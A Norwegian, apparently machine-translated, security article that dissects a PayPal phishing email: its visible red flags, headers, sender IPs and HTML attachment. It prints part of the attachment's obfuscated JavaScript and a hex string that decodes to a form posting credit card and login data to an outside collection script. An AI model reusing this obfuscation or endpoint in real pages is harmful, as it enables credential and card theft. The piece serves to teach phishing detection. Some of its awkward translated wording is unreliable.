Online sikkerhet bryter ned anatomien til en phishing-e-post
I dagens verden hvor all informasjon er online, er phishing et av de mest populære og ødeleggende nettangrepene, fordi du alltid kan rydde et virus, men hvis bankinformasjonen din blir stjålet, har du problemer. Her er en sammenfatning av et slikt angrep vi mottok.
Tror ikke at det bare er dine bankdetaljer som er viktige: Hvis noen får kontroll over kontoinnlogging, vet de ikke bare informasjonen i den kontoen, men oddsen er at samme innloggingsinformasjon kan brukes på forskjellige andre kontoer. Og hvis de kompromitterer e-postkontoen din, kan de tilbakestille alle dine andre passord.
Så i tillegg til å holde sterke og varierende passord, må du alltid være på utkikk etter falske e-postmeldinger som er deilig. Mens de fleste phishing-forsøk er amatørmessige, er noen ganske overbevisende, så det er viktig å forstå hvordan de kan gjenkjenne dem på overflatenivå, samt hvordan de fungerer under hetten.
Bilde av asirap
Undersøkelse Hva er i vanlig sikt
Vårt eksempel på e-post, som de fleste phishing-forsøk, "varsler" deg om aktivitet på PayPal-kontoen din, som under normale omstendigheter ville være alarmerende. Så kallet til handling er å bekrefte / gjenopprette kontoen din ved å sende inn omtrent alle personlige opplysninger du kan tenke på. Igjen, dette er ganske formelisk.
Mens det absolutt er unntak, er nesten alle phishing og svindel-e-post lastet med røde flagg direkte i meldingen selv. Selv om teksten er overbevisende, kan du vanligvis finne mange feil som er fylt gjennom meldingsorganet som indikerer at meldingen ikke er legitim.
Meldingstorget
Ved første øyekast er dette en av de bedre phishing-e-postene jeg har sett. Det er ingen stave- eller grammatiske feil, og verbiage leser etter hva du kan forvente. Det er imidlertid noen få røde flagg du kan se når du undersøker innholdet litt nærmere.
- "Paypal" - Det riktige tilfellet er "PayPal" (kapital P). Du kan se begge variantene blir brukt i meldingen. Bedrifter er svært bevisst med sin merkevarebygging, så det er tvilsomt noe som dette ville passere korrekturprosessen.
- "Tillat ActiveX" - Hvor mange ganger har du sett en legitim web-basert bedrift, størrelsen på Paypal bruker en proprietær komponent som bare fungerer på en nettleser, spesielt når de støtter flere nettlesere? Visst, et sted der ute, gjør noen selskaper det, men dette er et rødt flagg.
- "Sikkert." - Legg merke til hvordan dette ordet ikke rager opp i marginen med resten av avsnittet. Selv om jeg strekker vinduet litt mer, vil det ikke vikle eller plassere riktig.
- "Paypal!" - Rommet før utropstegnet ser vanskelig ut. Bare en annen quirk som jeg er sikker på, ikke ville være i en legitim e-post.
- "PayPal-kontooppdateringsformular.pdf.htm" - Hvorfor skulle Paypal legge ved en "PDF", spesielt når de bare kunne lenke til en side på nettstedet deres? I tillegg, hvorfor ville de forsøke å skjule en HTML-fil som PDF? Dette er det største røde flagget av dem alle.
Meldingsoverskriften
Når du ser på meldingsoverskriften, vises et par flere røde flagg:
- Fra adressen er [email protected].
- Adressen mangler. Jeg har ikke tømt dette ut, det er ganske enkelt ikke en del av standard meldingsoverskrift. Vanligvis vil et firma som har navnet ditt personliggjøre e-posten til deg.
Vedlegget
Når jeg åpner vedlegget, kan du umiddelbart se at oppsettet ikke er riktig fordi det mangler stilinformasjon. Igjen, hvorfor ville PayPal e-poste et HTML-skjema når de bare kunne gi deg en link på nettstedet deres?
Merk: Vi brukte Gmail's innebygde HTML-vedleggsvisning for dette, men vi anbefaler at du IKKE åpner vedlegg fra svindlere. Aldri. Noensinne. De inneholder svært ofte utnyttelser som vil installere trojanere på PCen din for å stjele kontoinformasjonen din.
Ruller ned litt mer, du kan se at dette skjemaet ikke bare krever innloggingsinformasjon for PayPal, men også for bankkort og kredittkortinformasjon. Noen av bildene er ødelagte.
Det er åpenbart at dette phishing-forsøket går etter alt med ett slag.
Den tekniske sammenbrudd
Selv om det skal være ganske klart basert på det som er klart i det hele tatt at dette er et phishing-forsøk, skal vi nå bryte ned den tekniske sminke av e-posten og se hva vi kan finne.
Informasjon fra vedlegget
Den første tingen å se på er HTML-kilden til vedleggsskjemaet som er det som sender dataene til det falske nettstedet.
Når du raskt ser på kilden, vises alle koblingene gyldige som de peker til enten "paypal.com" eller "paypalobjects.com" som begge er legit.
Nå skal vi ta en titt på noen grunnleggende sideinformasjon Firefox samler på siden.
Som du kan se, blir noen av grafikkene trukket fra domenene "blessedtobe.com", "goodhealthpharmacy.com" og "pic-upload.de" i stedet for legit PayPal-domener.
Informasjon fra e-posthodene
Neste vil vi se på de raske e-postmeldingshodene. Gmail gjør dette tilgjengelig via alternativet Vis original meny på meldingen.
Ser på headerinformasjonen for den opprinnelige meldingen, kan du se at denne meldingen ble komponert ved hjelp av Outlook Express 6. Jeg tviler på at PayPal har noen på personalet som sender hver av disse meldingene manuelt via en utdatert e-postklient.
Når vi ser på rutingsinformasjonen, kan vi se IP-adressen til både avsenderen og relaying-mailserveren.
IP-adressen til brukeren er original avsender. Å gjøre en rask oppslag på IP-informasjonen, vi kan se sendeprofilen er i Tyskland.
Og når vi ser på relaying-postserveren (mail.itak.at), kan IP-adressen vi ser dette være en ISP basert i Østerrike. Jeg tviler på at PayPal ruter sine e-postadresser direkte gjennom en Østerrike-basert ISP når de har en massiv serverfarm som lett kan håndtere denne oppgaven.
Hvor går dataene?
Så vi har klart fastslått at dette er en phishing-e-post og samlet litt informasjon om hvor meldingen stammer fra, men hva med hvor dataene dine er sendt?
For å se dette må vi først lagre HTM vedlegget gjør skrivebordet vårt og åpne i et tekstredigeringsprogram. Ruller gjennom det, alt ser ut til å være i orden, bortsett fra når vi kommer til en mistenkelig jakt-Javascript-blokk.
Å bryte ut hele kilden til den siste blokken Javascript, vi ser:
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
Var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for (i = 0; i
Når som helst ser du en stor jumbled streng av tilsynelatende tilfeldige bokstaver og tall innebygd i en Javascript-blokk, er det vanligvis noe mistenkelig. Ser du på koden, er variabelen "x" satt til denne store strengen og avkodes deretter til variabelen "y". Det endelige resultatet av variabel "y" skrives deretter til dokumentet som HTML.
Siden den store strengen er laget av tallene 0-9 og bokstavene a-f, er det mest sannsynlig kodet via en enkel ASCII til Hex-konvertering:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Oversetter til:
Det er ikke en tilfeldighet at dette dekoder til et gyldig HTML-skjema-tag som sender resultatene ikke til PayPal, men til en skurksteder.
I tillegg, når du ser HTML-kilden til skjemaet, vil du se at denne skjemaetiketten ikke er synlig fordi den genereres dynamisk via Javascript. Dette er en smart måte å skjule hva HTML-en egentlig gjør hvis noen bare skulle se den genererte kilden til vedlegget (som vi gjorde tidligere) i motsetning til å åpne vedlegget direkte i en tekstredigerer.
Kjører en rask whois på det fornærmende nettstedet, vi kan se dette er et domene som er hostet hos en populær webverten, 1and1.
Det som skiller seg ut er at domenet bruker et lesbart navn (i motsetning til noe som "dfh3sjhskjhw.net") og domenet har blitt registrert i 4 år. På grunn av dette tror jeg at dette domenet ble kapret og brukt som en bonde i dette phishing-forsøket.
Cynicism er et godt forsvar
Når det gjelder å holde seg trygg på nettet, gjør det aldri vondt for å ha en god grad av kynisme.
Selv om jeg er sikker på at det er flere røde flagg i eksemplet e-post, er det vi har påpekt ovenfor indikatorer vi så etter bare noen få minutters undersøkelse. Hypotetisk, hvis overflatenivået av e-posten etterlignet sin legitime motpart 100%, ville den tekniske analysen fortsatt avsløre sin sanne natur. Derfor importeres det for å kunne undersøke både hva du kan og ikke kan se.